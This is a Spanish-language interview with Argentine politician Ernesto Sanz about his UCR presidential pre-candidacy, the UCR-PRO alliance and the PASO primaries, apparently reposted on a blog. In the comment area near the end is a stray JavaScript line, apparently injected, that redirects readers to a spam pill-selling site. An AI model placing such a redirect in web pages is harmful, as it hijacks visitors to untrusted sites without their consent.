Ernesto Sanz: “Voy a las PASO con el espíritu de ganarlas”

Tras la convención radical, Ernesto Sanz será el precandidato a presidente por la UCR y competirá en las PASO con Mauricio Macri (PRO) y con Elisa Carrió (ARI). Repercusiones por la alianza electoral
Laura Zulián
zulian.laura@diariouno.net.ar
Fueron más de trece horas de intenso debate. Pero al final, la Unión Cívica Radical marcó el rumbo que seguirá para las próximas elecciones presidenciales. Ese camino será ir de la mano de una alianza con el PRO –encabezado por Mauricio Macri– y con Ernesto Sanz como candidato a presidente, reordenando así todo el panorama electoral argentino y dejando a Sanz en una posición de importancia en la carrera presidencial.
El que quedó como perdedor fue Julio Cobos, que bregaba por que la UCR se aliara con el Frente Amplio UNEN y ser él el precandidato de esa unión.
Fue tan agotadora y exhaustiva la jornada de la Convención Nacional de la UCR, y tan álgido y efusivo el discurso del ahora precandidato a presidente, Ernesto Sanz, que eso hizo que se quedara sin voz y no pudiera dar entrevistas por teléfono.
Pero aún así, escueto, Sanz respondió a UNO una pequeña nota.
–En caso de no ganar las PASO, ¿apostará por algún otro cargo ejecutivo como el de jefe de Gabinete?
–En primer lugar voy a las PASO con todo el espíritu de ganarlas pese a cualquier diferencia inicial. En caso de no lograrlo, militaré para que la coalición gobierne y en ese caso estaré donde haga falta. Como vicepresidente, imposible porque es un cargo incompatible con la competencia en las PASO.
–¿Cómo quedarán conformadas las listas para el Congreso?
–La idea es que las listas para el Congreso se acuerden de manera integrada antes de las PASO, de tal suerte que la única competencia se dé en la categoría presidencial.
–¿Cómo será el diálogo poselectoral entre las distintas fuerzas?
–Creo en una coalición para gobernar que construya mayorías parlamentarias, si se puede, de manera permanente y si no, ante cada proyecto parlamentario. En todos los casos se necesitará mucha capacidad de diálogo.
–Dentro de la UCR, algunos sectores dicen que esta unión con el PRO es una “derechización” de la UCR, ¿usted lo considera así?
–De ninguna manera. Eso es una chicana que oculta la falta de coraje para hacerse cargo de la demanda más importante que hay en la Argentina y que es la de equilibrar el sistema político y generar una alternancia al populismo.
–En Mendoza, la alianza PRO-UCR ya se materializó, ¿se realizarán acuerdos similares también en el resto de las provincias?
–Efectivamente. Hay muchas provincias en las que esos acuerdos están avanzando a pasos acelerados y con lo que ocurrió ayer (el sábado) en la convención eso será aun más fácil y rápido.
–En un panorama como gobierno, en una alianza UCR-PRO, ¿seguirán los lineamientos económicos liberales que plantean los economistas del macrismo?
–El programa económico de una coalición en la que participe la UCR tendrá que ser un programa de desarrollo, diversificación, productivista, y con una agenda social de inclusión e igualdad. Ese es precisamente el aporte que mi partido le hace a una coalición de gobierno.
Dejanos tu comentario

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *